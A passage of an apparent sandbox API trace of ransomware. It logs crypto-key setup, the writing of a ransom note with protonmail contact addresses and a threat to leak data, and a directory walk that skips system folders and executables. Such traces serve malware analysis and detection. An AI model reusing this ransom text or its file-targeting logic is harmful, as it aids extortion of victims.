Sleep (dwMilliseconds=0x1f4) [0087.352] Sleep (dwMilliseconds=0x1f4) [0087.859] Sleep (dwMilliseconds=0x1f4) [0088.600] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.562] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.534] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.644] Sleep (dwMilliseconds=0x1f4) [0094.202] Sleep (dwMilliseconds=0x1f4) [0094.738] Sleep (dwMilliseconds=0x1f4) [0095.239] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.269] Sleep (dwMilliseconds=0x1f4) [0096.800] Sleep (dwMilliseconds=0x1f4) [0097.314] Sleep (dwMilliseconds=0x1f4) [0097.836] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.879] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.949] Sleep (dwMilliseconds=0x1f4) [0101.485] Sleep (dwMilliseconds=0x1f4) [0102.035] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.870] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.011] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.111] Sleep (dwMilliseconds=0x1f4) [0107.741] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.900] Sleep (dwMilliseconds=0x1f4) [0109.404] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.605] Sleep (dwMilliseconds=0x1f4) [0111.338] Sleep (dwMilliseconds=0x1f4) [0111.860] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.167] Sleep (dwMilliseconds=0x1f4) [0113.690] Sleep (dwMilliseconds=0x1f4) [0114.286] Sleep (dwMilliseconds=0x1f4) [0114.805] Sleep (dwMilliseconds=0x1f4) [0115.737] Sleep (dwMilliseconds=0x1f4) [0116.253] Sleep (dwMilliseconds=0x1f4) [0116.947] Sleep (dwMilliseconds=0x1f4) [0117.515] Sleep (dwMilliseconds=0x1f4) [0118.030] Sleep (dwMilliseconds=0x1f4) [0118.545] Sleep (dwMilliseconds=0x1f4) [0119.307] Sleep (dwMilliseconds=0x1f4) [0119.815] Sleep (dwMilliseconds=0x1f4) [0120.746] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.806] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.573] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.845] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.377] Sleep (dwMilliseconds=0x1f4) [0126.891] Sleep (dwMilliseconds=0x1f4) [0127.573] Sleep (dwMilliseconds=0x1f4) [0128.218] Sleep (dwMilliseconds=0x1f4) [0128.732] Sleep (dwMilliseconds=0x1f4) [0129.247] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.381] Sleep (dwMilliseconds=0x1f4) [0130.916] Sleep (dwMilliseconds=0x1f4) [0131.431] Sleep (dwMilliseconds=0x1f4) [0131.946] Sleep (dwMilliseconds=0x1f4) [0132.662] Sleep (dwMilliseconds=0x1f4) [0136.806] Sleep (dwMilliseconds=0x1f4) [0137.394] Sleep (dwMilliseconds=0x1f4) [0138.009] Sleep (dwMilliseconds=0x1f4) [0139.386] Sleep (dwMilliseconds=0x1f4) [0139.920] Sleep (dwMilliseconds=0x1f4) [0140.480] Sleep (dwMilliseconds=0x1f4) [0141.059] Sleep (dwMilliseconds=0x1f4) [0141.651] Sleep (dwMilliseconds=0x1f4) [0142.413] Sleep (dwMilliseconds=0x1f4) [0142.927] Sleep (dwMilliseconds=0x1f4) [0143.493] Sleep (dwMilliseconds=0x1f4) [0144.128] Sleep (dwMilliseconds=0x1f4) [0144.689] Sleep (dwMilliseconds=0x1f4) [0145.189] Sleep (dwMilliseconds=0x1f4) [0145.704] Sleep (dwMilliseconds=0x1f4) [0146.220] Sleep (dwMilliseconds=0x1f4) [0146.806] Sleep (dwMilliseconds=0x1f4) [0147.311] Sleep (dwMilliseconds=0x1f4) [0147.893] Sleep (dwMilliseconds=0x1f4) [0148.428] Sleep (dwMilliseconds=0x1f4) [0148.985] Sleep (dwMilliseconds=0x1f4) [0149.560] Sleep (dwMilliseconds=0x1f4) [0150.073] Sleep (dwMilliseconds=0x1f4) [0150.712] Sleep (dwMilliseconds=0x1f4) [0151.370] Sleep (dwMilliseconds=0x1f4) [0151.882] Sleep (dwMilliseconds=0x1f4) [0152.435] Sleep (dwMilliseconds=0x1f4) [0152.943] Sleep (dwMilliseconds=0x1f4) [0153.457] Sleep (dwMilliseconds=0x1f4) [0154.147] Sleep (dwMilliseconds=0x1f4) [0154.867] Sleep (dwMilliseconds=0x1f4) [0155.991] Sleep (dwMilliseconds=0x1f4) [0156.885] Sleep (dwMilliseconds=0x1f4) [0157.641] Sleep (dwMilliseconds=0x1f4) [0158.251] Sleep (dwMilliseconds=0x1f4) [0158.792] Sleep (dwMilliseconds=0x1f4) [0159.405] Sleep (dwMilliseconds=0x1f4) [0159.931] Sleep (dwMilliseconds=0x1f4) [0160.502] Sleep (dwMilliseconds=0x1f4) [0161.054] Sleep (dwMilliseconds=0x1f4) [0161.571] Sleep (dwMilliseconds=0x1f4) Thread: id = 8 os_tid = 0x5f4 [0055.539] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x5f60000 [0055.540] CryptAcquireContextA (in: phProv=0x3e7fcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3e7fcf4*=0xed2308) returned 1 [0055.541] CryptImportKey (in: hProv=0xed2308, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x3e7ff80 | out: phKey=0x3e7ff80*=0xecf9e0) returned 1 [0055.541] Sleep (dwMilliseconds=0x1f4) [0060.638] Sleep (dwMilliseconds=0x1f4) [0069.843] Sleep (dwMilliseconds=0x1f4) [0070.519] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.074] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.826] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.845] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.875] Sleep (dwMilliseconds=0x1f4) [0079.389] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.419] Sleep (dwMilliseconds=0x1f4) [0080.934] Sleep (dwMilliseconds=0x1f4) [0081.449] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.478] Sleep (dwMilliseconds=0x1f4) [0083.190] Sleep (dwMilliseconds=0x1f4) [0084.149] Sleep (dwMilliseconds=0x1f4) [0084.694] Sleep (dwMilliseconds=0x1f4) [0085.210] Sleep (dwMilliseconds=0x1f4) [0085.800] Sleep (dwMilliseconds=0x1f4) [0086.315] Sleep (dwMilliseconds=0x1f4) [0086.830] Sleep (dwMilliseconds=0x1f4) [0087.352] Sleep (dwMilliseconds=0x1f4) [0087.860] Sleep (dwMilliseconds=0x1f4) [0088.600] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.562] Sleep (dwMilliseconds=0x1f4) [0091.233] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.541] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.645] Sleep (dwMilliseconds=0x1f4) [0094.203] Sleep (dwMilliseconds=0x1f4) [0094.738] Sleep (dwMilliseconds=0x1f4) [0095.239] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.269] Sleep (dwMilliseconds=0x1f4) [0096.800] Sleep (dwMilliseconds=0x1f4) [0097.314] Sleep (dwMilliseconds=0x1f4) [0097.836] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.874] Sleep (dwMilliseconds=0x1f4) [0099.880] Sleep (dwMilliseconds=0x1f4) [0100.423] Sleep (dwMilliseconds=0x1f4) [0100.949] Sleep (dwMilliseconds=0x1f4) [0101.485] Sleep (dwMilliseconds=0x1f4) [0102.035] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.871] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.012] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.585] Sleep (dwMilliseconds=0x1f4) [0107.111] Sleep (dwMilliseconds=0x1f4) [0107.744] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.901] Sleep (dwMilliseconds=0x1f4) [0109.404] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.605] Sleep (dwMilliseconds=0x1f4) [0111.338] Sleep (dwMilliseconds=0x1f4) [0111.860] Sleep (dwMilliseconds=0x1f4) [0112.591] Sleep (dwMilliseconds=0x1f4) [0113.169] Sleep (dwMilliseconds=0x1f4) [0113.690] Sleep (dwMilliseconds=0x1f4) [0114.287] Sleep (dwMilliseconds=0x1f4) [0114.805] Sleep (dwMilliseconds=0x1f4) [0115.737] Sleep (dwMilliseconds=0x1f4) [0116.254] Sleep (dwMilliseconds=0x1f4) [0116.947] Sleep (dwMilliseconds=0x1f4) [0117.515] Sleep (dwMilliseconds=0x1f4) [0118.030] Sleep (dwMilliseconds=0x1f4) [0118.545] Sleep (dwMilliseconds=0x1f4) [0119.308] Sleep (dwMilliseconds=0x1f4) [0119.816] Sleep (dwMilliseconds=0x1f4) [0120.749] Sleep (dwMilliseconds=0x1f4) [0121.272] Sleep (dwMilliseconds=0x1f4) [0121.806] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.574] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.845] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.862] Sleep (dwMilliseconds=0x1f4) [0126.377] Sleep (dwMilliseconds=0x1f4) [0126.892] Sleep (dwMilliseconds=0x1f4) [0127.573] Sleep (dwMilliseconds=0x1f4) [0128.218] Sleep (dwMilliseconds=0x1f4) [0128.732] Sleep (dwMilliseconds=0x1f4) [0129.247] Sleep (dwMilliseconds=0x1f4) [0129.761] Sleep (dwMilliseconds=0x1f4) [0130.381] Sleep (dwMilliseconds=0x1f4) [0130.916] Sleep (dwMilliseconds=0x1f4) [0131.431] Sleep (dwMilliseconds=0x1f4) [0131.946] Sleep (dwMilliseconds=0x1f4) [0132.711] Sleep (dwMilliseconds=0x1f4) [0137.001] Sleep (dwMilliseconds=0x1f4) [0137.532] Sleep (dwMilliseconds=0x1f4) [0138.062] Sleep (dwMilliseconds=0x1f4) [0139.453] Sleep (dwMilliseconds=0x1f4) [0140.056] Sleep (dwMilliseconds=0x1f4) [0140.575] Sleep (dwMilliseconds=0x1f4) [0141.144] Sleep (dwMilliseconds=0x1f4) [0141.668] Sleep (dwMilliseconds=0x1f4) [0142.413] Sleep (dwMilliseconds=0x1f4) [0142.928] Sleep (dwMilliseconds=0x1f4) [0143.493] Sleep (dwMilliseconds=0x1f4) [0144.128] Sleep (dwMilliseconds=0x1f4) [0144.689] Sleep (dwMilliseconds=0x1f4) [0145.190] Sleep (dwMilliseconds=0x1f4) [0145.704] Sleep (dwMilliseconds=0x1f4) [0146.220] Sleep (dwMilliseconds=0x1f4) [0146.806] Sleep (dwMilliseconds=0x1f4) [0147.311] Sleep (dwMilliseconds=0x1f4) [0147.893] Sleep (dwMilliseconds=0x1f4) [0148.429] Sleep (dwMilliseconds=0x1f4) [0148.985] Sleep (dwMilliseconds=0x1f4) [0149.561] Sleep (dwMilliseconds=0x1f4) [0150.074] Sleep (dwMilliseconds=0x1f4) [0150.712] Sleep (dwMilliseconds=0x1f4) [0151.370] Sleep (dwMilliseconds=0x1f4) [0151.882] Sleep (dwMilliseconds=0x1f4) [0152.435] Sleep (dwMilliseconds=0x1f4) [0152.943] Sleep (dwMilliseconds=0x1f4) [0153.458] Sleep (dwMilliseconds=0x1f4) [0154.148] Sleep (dwMilliseconds=0x1f4) [0154.867] Sleep (dwMilliseconds=0x1f4) [0155.991] Sleep (dwMilliseconds=0x1f4) [0156.885] Sleep (dwMilliseconds=0x1f4) [0157.641] Sleep (dwMilliseconds=0x1f4) [0158.251] Sleep (dwMilliseconds=0x1f4) [0158.793] Sleep (dwMilliseconds=0x1f4) [0159.405] Sleep (dwMilliseconds=0x1f4) [0159.932] Sleep (dwMilliseconds=0x1f4) [0160.503] Sleep (dwMilliseconds=0x1f4) [0161.055] Sleep (dwMilliseconds=0x1f4) [0161.571] Sleep (dwMilliseconds=0x1f4) Thread: id = 9 os_tid = 0x5e4 [0055.541] VirtualAlloc (lpAddress=0x0, dwSize=0x500040, flAllocationType=0x3000, flProtect=0x4) returned 0x6470000 [0055.541] CryptAcquireContextA (in: phProv=0x3fbfcf4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3fbfcf4*=0xed2a70) returned 1 [0055.542] CryptImportKey (in: hProv=0xed2a70, pbData=0x2826098, dwDataLen=0x1000, hPubKey=0x0, dwFlags=0x0, phKey=0x3fbff80 | out: phKey=0x3fbff80*=0xecfa60) returned 1 [0055.542] Sleep (dwMilliseconds=0x1f4) [0060.638] Sleep (dwMilliseconds=0x1f4) [0069.843] Sleep (dwMilliseconds=0x1f4) [0070.519] Sleep (dwMilliseconds=0x1f4) [0071.043] Sleep (dwMilliseconds=0x1f4) [0071.558] Sleep (dwMilliseconds=0x1f4) [0072.074] Sleep (dwMilliseconds=0x1f4) [0072.724] Sleep (dwMilliseconds=0x1f4) [0076.827] Sleep (dwMilliseconds=0x1f4) [0077.330] Sleep (dwMilliseconds=0x1f4) [0077.845] Sleep (dwMilliseconds=0x1f4) [0078.360] Sleep (dwMilliseconds=0x1f4) [0078.875] Sleep (dwMilliseconds=0x1f4) [0079.390] Sleep (dwMilliseconds=0x1f4) [0079.904] Sleep (dwMilliseconds=0x1f4) [0080.419] Sleep (dwMilliseconds=0x1f4) [0080.934] Sleep (dwMilliseconds=0x1f4) [0081.449] Sleep (dwMilliseconds=0x1f4) [0081.963] Sleep (dwMilliseconds=0x1f4) [0082.479] Sleep (dwMilliseconds=0x1f4) [0083.191] Sleep (dwMilliseconds=0x1f4) [0084.160] Sleep (dwMilliseconds=0x1f4) [0084.703] Sleep (dwMilliseconds=0x1f4) [0085.210] Sleep (dwMilliseconds=0x1f4) [0085.800] Sleep (dwMilliseconds=0x1f4) [0086.315] Sleep (dwMilliseconds=0x1f4) [0086.830] Sleep (dwMilliseconds=0x1f4) [0087.352] Sleep (dwMilliseconds=0x1f4) [0087.860] Sleep (dwMilliseconds=0x1f4) [0088.600] Sleep (dwMilliseconds=0x1f4) [0089.500] Sleep (dwMilliseconds=0x1f4) [0090.048] Sleep (dwMilliseconds=0x1f4) [0090.562] Sleep (dwMilliseconds=0x1f4) [0091.234] Sleep (dwMilliseconds=0x1f4) [0091.754] Sleep (dwMilliseconds=0x1f4) [0092.541] Sleep (dwMilliseconds=0x1f4) [0093.111] Sleep (dwMilliseconds=0x1f4) [0093.645] Sleep (dwMilliseconds=0x1f4) [0094.203] Sleep (dwMilliseconds=0x1f4) [0094.738] Sleep (dwMilliseconds=0x1f4) [0095.239] Sleep (dwMilliseconds=0x1f4) [0095.754] Sleep (dwMilliseconds=0x1f4) [0096.269] Sleep (dwMilliseconds=0x1f4) [0096.800] Sleep (dwMilliseconds=0x1f4) [0097.314] Sleep (dwMilliseconds=0x1f4) [0097.836] Sleep (dwMilliseconds=0x1f4) [0098.359] Sleep (dwMilliseconds=0x1f4) [0098.875] Sleep (dwMilliseconds=0x1f4) [0099.880] Sleep (dwMilliseconds=0x1f4) [0100.424] Sleep (dwMilliseconds=0x1f4) [0100.949] Sleep (dwMilliseconds=0x1f4) [0101.485] Sleep (dwMilliseconds=0x1f4) [0102.035] Sleep (dwMilliseconds=0x1f4) [0102.725] Sleep (dwMilliseconds=0x1f4) [0103.335] Sleep (dwMilliseconds=0x1f4) [0103.871] Sleep (dwMilliseconds=0x1f4) [0104.388] Sleep (dwMilliseconds=0x1f4) [0105.012] Sleep (dwMilliseconds=0x1f4) [0105.559] Sleep (dwMilliseconds=0x1f4) [0106.586] Sleep (dwMilliseconds=0x1f4) [0107.111] Sleep (dwMilliseconds=0x1f4) [0107.765] Sleep (dwMilliseconds=0x1f4) [0108.360] Sleep (dwMilliseconds=0x1f4) [0108.901] Sleep (dwMilliseconds=0x1f4) [0109.404] Sleep (dwMilliseconds=0x1f4) [0110.104] Sleep (dwMilliseconds=0x1f4) [0110.605] Sleep (dwMilliseconds=0x1f4) [0111.338] Sleep (dwMilliseconds=0x1f4) [0111.860] Sleep (dwMilliseconds=0x1f4) [0112.592] Sleep (dwMilliseconds=0x1f4) [0113.169] Sleep (dwMilliseconds=0x1f4) [0113.690] Sleep (dwMilliseconds=0x1f4) [0114.287] Sleep (dwMilliseconds=0x1f4) [0114.805] Sleep (dwMilliseconds=0x1f4) [0115.737] Sleep (dwMilliseconds=0x1f4) [0116.254] Sleep (dwMilliseconds=0x1f4) [0116.947] Sleep (dwMilliseconds=0x1f4) [0117.516] Sleep (dwMilliseconds=0x1f4) [0118.030] Sleep (dwMilliseconds=0x1f4) [0118.545] Sleep (dwMilliseconds=0x1f4) [0119.308] Sleep (dwMilliseconds=0x1f4) [0119.816] Sleep (dwMilliseconds=0x1f4) [0120.749] Sleep (dwMilliseconds=0x1f4) [0121.273] Sleep (dwMilliseconds=0x1f4) [0121.806] Sleep (dwMilliseconds=0x1f4) [0122.494] Sleep (dwMilliseconds=0x1f4) [0123.047] Sleep (dwMilliseconds=0x1f4) [0123.574] Sleep (dwMilliseconds=0x1f4) [0124.084] Sleep (dwMilliseconds=0x1f4) [0124.845] Sleep (dwMilliseconds=0x1f4) [0125.347] Sleep (dwMilliseconds=0x1f4) [0125.863] Sleep (dwMilliseconds=0x1f4) [0126.377] Sleep (dwMilliseconds=0x1f4) [0126.892] Sleep (dwMilliseconds=0x1f4) [0127.573] Sleep (dwMilliseconds=0x1f4) [0128.218] Sleep (dwMilliseconds=0x1f4) [0128.732] Sleep (dwMilliseconds=0x1f4) [0129.247] Sleep (dwMilliseconds=0x1f4) [0129.762] Sleep (dwMilliseconds=0x1f4) [0130.381] Sleep (dwMilliseconds=0x1f4) [0130.916] Sleep (dwMilliseconds=0x1f4) [0131.431] Sleep (dwMilliseconds=0x1f4) [0131.946] Sleep (dwMilliseconds=0x1f4) [0132.756] Sleep (dwMilliseconds=0x1f4) [0137.001] Sleep (dwMilliseconds=0x1f4) [0137.532] Sleep (dwMilliseconds=0x1f4) [0138.062] Sleep (dwMilliseconds=0x1f4) [0139.453] Sleep (dwMilliseconds=0x1f4) [0140.056] Sleep (dwMilliseconds=0x1f4) [0140.576] Sleep (dwMilliseconds=0x1f4) [0141.144] Sleep (dwMilliseconds=0x1f4) [0141.668] Sleep (dwMilliseconds=0x1f4) [0142.413] Sleep (dwMilliseconds=0x1f4) [0142.928] Sleep (dwMilliseconds=0x1f4) [0143.493] Sleep (dwMilliseconds=0x1f4) [0144.128] Sleep (dwMilliseconds=0x1f4) [0144.690] Sleep (dwMilliseconds=0x1f4) [0145.190] Sleep (dwMilliseconds=0x1f4) [0145.705] Sleep (dwMilliseconds=0x1f4) [0146.220] Sleep (dwMilliseconds=0x1f4) [0146.806] Sleep (dwMilliseconds=0x1f4) [0147.312] Sleep (dwMilliseconds=0x1f4) [0147.893] Sleep (dwMilliseconds=0x1f4) [0148.429] Sleep (dwMilliseconds=0x1f4) [0148.985] Sleep (dwMilliseconds=0x1f4) [0149.561] Sleep (dwMilliseconds=0x1f4) [0150.074] Sleep (dwMilliseconds=0x1f4) [0150.712] Sleep (dwMilliseconds=0x1f4) [0151.370] Sleep (dwMilliseconds=0x1f4) [0151.882] Sleep (dwMilliseconds=0x1f4) [0152.435] Sleep (dwMilliseconds=0x1f4) [0152.943] Sleep (dwMilliseconds=0x1f4) [0153.458] Sleep (dwMilliseconds=0x1f4) [0154.148] Sleep (dwMilliseconds=0x1f4) [0154.867] Sleep (dwMilliseconds=0x1f4) [0155.991] Sleep (dwMilliseconds=0x1f4) [0156.885] Sleep (dwMilliseconds=0x1f4) [0157.641] Sleep (dwMilliseconds=0x1f4) [0158.251] Sleep (dwMilliseconds=0x1f4) [0158.793] Sleep (dwMilliseconds=0x1f4) [0159.405] Sleep (dwMilliseconds=0x1f4) [0159.932] Sleep (dwMilliseconds=0x1f4) [0160.503] Sleep (dwMilliseconds=0x1f4) [0161.055] Sleep (dwMilliseconds=0x1f4) [0161.571] Sleep (dwMilliseconds=0x1f4) Thread: id = 10 os_tid = 0x6c8 Thread: id = 11 os_tid = 0x9c4 Thread: id = 12 os_tid = 0xbc4 Thread: id = 13 os_tid = 0x64 Thread: id = 274 os_tid = 0xafc [0134.779] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a50 [0134.779] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.779] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a00 [0134.779] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.779] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.779] CreateFileW (lpFileName="C:\\R3ADM3.txt" (normalized: "c:\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0134.781] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.782] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0134.782] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.782] WriteFile (in: hFile=0x1f0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0134.783] CloseHandle (hObject=0x1f0) returned 1 [0134.785] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a00 | out: hHeap=0xea0000) returned 1 [0134.785] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.785] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0xecfc60 [0134.785] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.786] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0134.786] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0134.786] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x772f0000 [0134.786] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="tmp") returned 0x0 [0134.786] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="winnt") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="temp") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="thumb") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="$Recycle.Bin") returned="$Recycle.Bin" [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".UAKXC") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".exe") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".dll") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".lnk") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".sys") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch=".msi") returned 0x0 [0134.787] StrStrIW (lpFirst="$Recycle.Bin", lpSrch="R3ADM3.txt") returned 0x0 [0134.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8b68 [0134.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec86b8 [0134.787] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8938 [0134.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.787] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8b68 | out: hHeap=0xea0000) returned 1 [0134.787] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x76d30000 [0134.787] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0134.788] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0134.788] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="tmp") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="winnt") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="temp") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="thumb") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="$Recycle.Bin") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="System Volume Information") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="Boot") returned="Boot" [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".UAKXC") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".exe") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".dll") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".lnk") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".sys") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch=".msi") returned 0x0 [0134.788] StrStrIW (lpFirst="Boot", lpSrch="R3ADM3.txt") returned 0x0 [0134.788] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8b68 [0134.788] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: 